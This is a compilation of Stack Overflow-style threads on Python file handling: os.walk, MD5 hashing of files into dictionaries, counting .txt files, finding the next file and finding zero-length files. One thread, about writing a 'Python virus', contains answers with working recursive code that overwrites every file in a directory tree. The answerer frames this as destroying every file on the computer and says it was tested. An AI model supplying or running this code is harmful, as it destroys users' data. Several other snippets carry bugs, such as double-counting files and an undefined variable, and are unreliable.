Adding hashes and files names to lists and dictionaries - python

Hey guys I was able to get the hashes to individually work for the files I input. I was wondering how to add the file name to the list I have set and the hash to the other dictionary. I feel like it is a pretty simple fix I am just stuck. we have to use a file path on our machines that has been established already. the folder I am using has 3 or 4 files in it. I am just trying to figure out how to add each of the hases to the lists Thanks!
from __future__ import print_function
'''
Week Two Assignment 2 - File Hashing
'''
'''
Complete the script below to do the following:
1) Add your name, date, assignment number to the top of this script
2) Using the os library and the os.walk() method
a) Create a list of all files
b) Create an empty dictionary named fileHashes
c) Iterate through the list of files and
- calculate the md5 hash of each file
- create a dictionary entry where:
key = md5 hash
value = filepath
d) Iterate through the dictionary
- print out each key, value pair
3) Submit
NamingConvention: lastNameFirstInitial_Assignment_.ext
for example: hosmerC_WK1_script.py
hosmerC_WK1_screenshot.jpg
A) Screenshot of the results in WingIDE
B) Your Script
'''
import os
import hashlib
import sys
directory = "."
fileList = []
fileHashes = {}
# Psuedo Constants
SCRIPT_NAME = "Script: ASSIGNMENT NAME"
SCRIPT_AUTHOR = "Author: NAME"
SCRIPT_DATE = "Date: 25 January 2021"
print(SCRIPT_NAME)
print(SCRIPT_AUTHOR)
print(SCRIPT_DATE)
for root, dirs, files in os.walk(directory):
# Walk the path from top to bottom.
# For each file obtain the filename
for fileName in files:
path = os.path.join(root, fileName)
fullPath = os.path.abspath(path)
print(files)
''' Determine which version of Python '''
if sys.version_info[0] < 3:
PYTHON_2 = True
else:
PYTHON_2 = False
def HashFile(filePath):
'''
function takes one input a valid filePath
returns the hexdigest of the file
or error
'''
try:
with open(filePath, 'rb') as fileToHash:
fileContents = fileToHash.read()
hashObj = hashlib.md5()
hashObj.update(fileContents)
digest = hashObj.hexdigest()
return digest
except Exception as err:
return str(err)
print()
if PYTHON_2:
fileName = raw_input("Enter file to hash: ")
else:
fileName = input("Enter file to hash: ")
hexDigest = HashFile(fileName)
print(hexDigest)

Well, you've done most of the work in the assignment, so kudos to you for that. You just need to refine a few things and use your functions together.
For item "a) Create a list of all files": In the for fileName in files: loop, add the line fileList.append(fullPath). (See list.append() for more info.)
indent it so it's part of the for loop.
Btw, the print(files) line you have is outside the loop so it will only print the files of the last folder that was os.walk'ed.
Change that to print(fileList)
For "c) Iterate through the list of files and...":
Iterate through the fileList and call the HashFile() function for each file. The return value is the key for your dictionary and the filepath is the value:
for filepath in fileList:
filehash = HashFile(filepath)
fileHashes[filehash] = filepath
The one-line version of that, using a dictionary comprehension:
fileHashes = {HashFile(filepath): filepath for filepath in fileList}
For "d) Iterate through the dictionary": I think you'll be able to manage that on your own. (See dict.items() for more info.)
Other notes:
A.) In the except block for calculating hashes, returning a string of the error - was the pre-written for you in the assignment or did you write it? If you wrote it, consider removing it - coz then that error message becomes the hash of the file since you're returning it. Possibly just print the error; unless you were instructed otherwise.
B.) The "input filename" part is not needed - you'll be calculating the hash of the all files in the "current" directory where your script is executed (as shown above).
C.) Btw, for md5, since finding collisions is a known flaw, may want to add each file as a list of values. Maybe it's part of the test. Or can be safely ignored.

Related

how to loop through folders thoroughly? python

I'm new to python and get stuck by a problem I encountered while studying loops and folder navigation.
The task is simple: loop through a folder and count all '.txt' files.
I believe there may be some modules to tackle this task easily and I would appreciate it if you can share them. But since this is just a random question I encountered while learning python, it would be nice if this can be solved using the tools I just acquired, like for/while loops.
I used for and while clauses to loop through a folder. However, I'm unable to loop through a folder entirely.
Here is the code I used:
import os
count=0 # set count default
path = 'E:\\' # set path
while os.path.isdir(path):
for file in os.listdir(path): # loop through the folder
print(file) # print text to keep track the process
if file.endswith('.txt'):
count+=1
print('+1') #
elif os.path.isdir(os.path.join(path,file)): #if it is a subfolder
print(os.path.join(path,file))
path=os.path.join(path,file)
print('is dir')
break
else:
path=os.path.join(path,file)
Since the number of files and subfolders in a folder is unknown, I think a while loop is appropriate here. However, my code has many errors or pitfalls I don't know how to fix. for example, if multiple subfolders exist, this code will only loop the first subfolder and ignore the rest.
Your problem is that you quickly end up trying to look at non-existent files. Imagine a directory structure where a non-directory named A (E:\A) is seen first, then a file b (E:\b).
On your first loop, you get A, detect it does not end in .txt, and that it is a directory, so you change path to E:\A.
On your second iteration, you get b (meaning E:\b), but all your tests (aside from the .txt extension test) and operations concatenate it with the new path, so you test relative to E:\A\b, not E:\b.
Similarly, if E:\A is a directory, you break the inner loop immediately, so even if E:\c.txt exists, if it occurs after A in the iteration order, you never even see it.
Directory tree traversal code must involve a stack of some sort, either explicitly (by appending and poping from a list of directories for eventual processing), or implicitly (via recursion, which uses the call stack to achieve the same purpose).
In any event, your specific case should really just be handled with os.walk:
for root, dirs, files in os.walk(path):
print(root) # print text to keep track the process
count += sum(1 for f in files if f.endswith('txt'))
# This second line matches your existing behavior, but might not be intended
# Remove it if directories ending in .txt should not be included in the count
count += sum(1 for d in files if d.endswith('txt'))
Just for illustration, the explicit stack approach to your code would be something like:
import os
count = 0 # set count default
paths = ['E:\\'] # Make stack of paths to process
while paths:
# paths.pop() gets top of directory stack to process
# os.scandir is easier and more efficient than os.listdir,
# though it must be closed (but with statement does this for us)
with os.scandir(paths.pop()) as entries:
for entry in entries: # loop through the folder
print(entry.name) # print text to keep track the process
if entry.name.endswith('.txt'):
count += 1
print('+1')
elif entry.is_dir(): #if it is a subfolder
print(entry.path, 'is dir')
# Add to paths stack to get to it eventually
paths.append(entry.path)
You probably want to apply recursion to this problem. In short, you will need a function to handle directories that will call itself when it encounters a sub-directory.
This might be more than you need, but it will allow you to list all the files within the directory that are .txt files but you can also add criteria to the search within the files as well. Here is the function:
def file_search(root,extension,search,search_type):
import pandas as pd
import os
col1 = []
col2 = []
rootdir = root
for subdir, dirs, files in os.walk(rootdir):
for file in files:
if "." + extension in file.lower():
try:
with open(os.path.join(subdir, file)) as f:
contents = f.read()
if search_type == 'any':
if any(word.lower() in contents.lower() for word in search):
col1.append(subdir)
col2.append(file)
elif search_type == 'all':
if all(word.lower() in contents.lower() for word in search):
col1.append(subdir)
col2.append(file)
except:
pass
df = pd.DataFrame({'Folder':col1,
'File':col2})[['Folder','File']]
return df
Here is an example of how to use the function:
search_df = file_search(root = r'E:\\',
search=['foo','bar'], #words to search for
extension = 'txt', #could change this to 'csv' or 'sql' etc.
search_type = 'all') #use any or all
search_df
The analysis of your code has already been addressed by #ShadowRanger's answer quite well.
I will try to address this part of your question:
there may be some modules to tackle this task easily
For these kind of tasks, there actually exists the glob module, which implements Unix style pathname pattern expansion.
To count the number of .txt files in a directory and all its subdirectories, one may simply use the following:
import os
from glob import iglob, glob
dirpath = '.' # for example
# getting all matching elements in a list a computing its length
len(glob(os.path.join(dirpath, '**/*.txt'), recursive=True))
# 772
# or iterating through all matching elements and summing 1 each time a new item is found
# (this approach is more memory-efficient)
sum(1 for _ in iglob(os.path.join(dirpath, '**/*.txt'), recursive=True))
# 772
Basically glob.iglob() is the iterator version of glob.glob().
for nested Directories it's easier to use functions like os.walk
take this for example
subfiles = []
for dirpath, subdirs, files in os.walk(path):
for x in files:
if x.endswith(".txt"):
subfiles.append(os.path.join(dirpath, x))`
and it'ill return a list of all txt files
else ull need to use Recursion for task like this

Given a filename, go to the next file in a directory

I am writing a method that takes a filename and a path to a directory and returns the next available filename in the directory or None if there are no files with names that would sort after the file.
There are plenty of questions about how to list all the files in a directory or iterate over them, but I am not sure if the best solution to finding a single next filename is to use the list that one of the previous answers generated and then find the location of the current file in the list and choose the next element (or None if we're already on the last one).
EDIT: here's my current file-picking code. It's reused from a different part of the project, where it is used to pick a random image from a potentially nested series of directories.
# picks a file from a directory
# if the file is also a directory, pick a file from the new directory
# this might choke up if it encounters a directory only containing invalid files
def pickNestedFile(directory, bad_files):
file=None
while file is None or file in bad_files:
file=random.choice(os.listdir(directory))
#file=directory+file # use the full path name
print "Trying "+file
if os.path.isdir(os.path.join(directory, file))==True:
print "It's a directory!"
return pickNestedFile(directory+"/"+file, bad_files)
else:
return directory+"/"+file
The program I am using this in now is to take a folder of chatlogs, pick a random log, starting position, and length. These will then be processed into a MOTD-like series of (typically) short log snippets. What I need the next-file picking ability for is when the length is unusually long or the starting line is at the end of the file, so that it continues at the top of the next file (a.k.a. wrap around midnight).
I am open to the idea of using a different method to choose the file, since the above method does not discreetly give a separate filename and directory and I'd have to go use a listdir and match to get an index anyway.
You should probably consider rewriting your program to not have to use this. But this would be how you could do it:
import os
def nextFile(filename,directory):
fileList = os.listdir(directory)
nextIndex = fileList.index(filename) + 1
if nextIndex == 0 or nextIndex == len(fileList):
return None
return fileList[nextIndex]
print(nextFile("mail","test"))
I tweaked the accepted answer to allow new files to be added to the directory on the fly and for it to work if a file is deleted or changed or doesn't exist. There are better ways to work with filenames/paths, but the example below keeps it simple. Maybe it's helpful:
import os
def next_file_in_dir(directory, current_file=None):
file_list = os.listdir(directory)
next_index = 0
if current_file in file_list:
next_index = file_list.index(current_file) + 1
if next_index >= len(file_list):
next_index = 0
return file_list[next_index]
file_name = None
directory = "videos"
user_advanced_to_next = True
while user_advanced_to_next:
file_name = next_file_in_dir(directory=directory, current_file=file_name )
user_advanced_to_next = play_video("{}/{}".format(directory, file_name))
finish_and_clean_up()

Finding and printing file name of zero length files in python

I'm learning about the os module and I need to work out to print the file names of only zero length files and the count.
So far I've figured the easiest way to do it is to generate a list or a tuple of files and their sizes in this format:
((zerotextfile1.txt, 0), (notazerotextfile.txt, 15))
Then use an if statement to only print out only files with zero length.
Then use a sum function to add the number of list items to get the count of zero length files.
So far, I've got bits and pieces - it's how to put them together I'm having trouble with.
Some of my bits (viable code I've managed to write, not much, I know):
import os
place = 'C:\\Users\\Me\\Documents\\Python Programs\\'
for files in os.walk(place):
print (files)
Then there is stuff like os.path.getsize() which requires I put in a filename, so I figure I've got to use a for loop to print a list of the file names in this function in order to get it to work, right?
Any tips or pointing in the right direction would be vastly appreciated!
import os
place = 'C:\\Users\\Me\\Documents\\Python Programs\\'
for root, dirs, files in os.walk(place):
for f in files:
file_path = os.path.join(root, f) #Full path to the file
size = os.path.getsize(file_path) #pass the full path to getsize()
if size == 0:
print f, file_path
are you looking for the following ?
import os
place = 'C:\\Users\\Me\\Documents\\Python Programs\\'
for files in os.walk(place):
if os.path.getsize(b[0] + '\\' +b[2][0]) == 0:
print (files)

Listing Directories In Python Multi Line

i need help trying to list directories in python, i am trying to code a python virus, just proof of concept, nothing special.
#!/usr/bin/python
import os, sys
VIRUS=''
data=str(os.listdir('.'))
data=data.translate(None, "[],\n'")
print data
f = open(data, "w")
f.write(VIRUS)
f.close()
EDIT: I need it to be multi-lined so when I list the directorys I can infect the first file that is listed then the second and so on.
I don't want to use the ls command cause I want it to be multi-platform.
Don't call str on the result of os.listdir if you're just going to try to parse it again. Instead, use the result directly:
for item in os.listdir('.'):
print item # or do something else with item
So when writing a virus like this, you will want it to be recursive. This way it will be able to go inside every directory it finds and write over those files as well, completely destroying every single file on the computer.
def virus(directory=os.getcwd()):
VIRUS = "THIS FILE IS NOW INFECTED"
if directory[-1] == "/": #making sure directory can be concencated with file
pass
else:
directory = directory + "/" #making sure directory can be concencated with file
files = os.listdir(directory)
for i in files:
location = directory + i
if os.path.isfile(location):
with open(location,'w') as f:
f.write(VIRUS)
elif os.path.isdir(location):
virus(directory=location) #running function again if in a directory to go inside those files
Now this one line will rewrite all files as the message in the variable VIRUS:
virus()
Extra explanation:
the reason I have the default as: directory=os.getcwd() is because you originally were using ".", which, in the listdir method, will be the current working directories files. I needed the name of the directory on file in order to pull the nested directories
This does work!:
I ran it in a test directory on my computer and every file in every nested directory had it's content replaced with: "THIS FILE IS NOW INFECTED"
Something like this:
import os
VIRUS = "some text"
data = os.listdir(".") #returns a list of files and directories
for x in data: #iterate over the list
if os.path.isfile(x): #if current item is a file then perform write operation
#use `with` statement for handling files, it automatically closes the file
with open(x,'w') as f:
f.write(VIRUS)

Incomplete loading of a dictionary

Disclosure: I am new to python. I am trying to load a dictionary with files using the hash value as my key and the file path as my value. I added a counter to ensure the dictionary was properly loaded. After running the code below, I have 78 files (Counter) but only 47 for my dictionary length. Why did it not load all 78 files? Any help is greatly appreciated!
for dirname, dirnames, filenames in os.walk('.'):
for subdirname in dirnames:
os.path.join(dirname, subdirname)
for filename in filenames:
m1 = hashlib.md5(filename)
hValue = m1.hexdigest()
pValue = os.path.join(dirname, filename)
myDict[(hValue)]=pValue
counter +=1
print len(myDict), "Dict Length"
print counter, "counter"
You call os.path.join but don't keep the value, so your first nested for loop is useless. I'm not sure what it was meant to do.
You don't need to create an md5 hash of the filename, just use the filename as the key for the dict.
You are probably missing entries because you have files with the same name in different directories. Use os.path.join(dirname, filename) as the key for the dict.
Update: you're hashing the filename. To hash the contents:
m1 = hashlib.md5(open(filename).read())
The dictionary keys need to be unique (or you will just overwrite the value corresponding to the key), and uniqueness isn't guaranteed by your method.
Since you're just hashing the filenames, if your filenames aren't unique, your hashes won't be either. Try hashing the full path.
Disclaimer: this is my first answer in stackoverflow :)
Hi #Jarid F,
I tried writing a complete program so that you can run and see for yourself. Here's the code:
import os
import hashlib
myDict = {}
counter = 0
for dirname, dirnames, filenames in os.walk('.'):
for filename in filenames:
#get the complete file location so that it's unique
filename_with_path = os.path.join(dirname, filename)
m1 = hashlib.md5(filename_with_path)
#to hash the content of the file:
#m1 = hashlib.md5(open(filename_with_path).read())
hValue = m1.hexdigest()
myDict[hValue] = filename_with_path
counter += 1
print len(myDict), "Dict Length"
print counter, "counter"
assert counter == len(myDict)
To add on a few points which #Ned Batchelder has provided:
The line myDict[(hValue)]=pValue is actually the same as myDict[hValue] = pValue but I recommend not adding the () in. That will cause confusion later when you start working with tuples
Hashing the content of the filename may not be want you want, since even if two files are different but they have the same content (like 2 empty files) they will yeild the same hash value. I guess that defeats the purpose you're trying to achieve here. Instead if I may suggest, you could take hash(hash(file_location)+hash(file_content)+some_secret_key) to make the hash key better. (Please pardon my cautious in adding the secret key as an extra security measure)
Good luck with your code & welcome to python!

Categories

Resources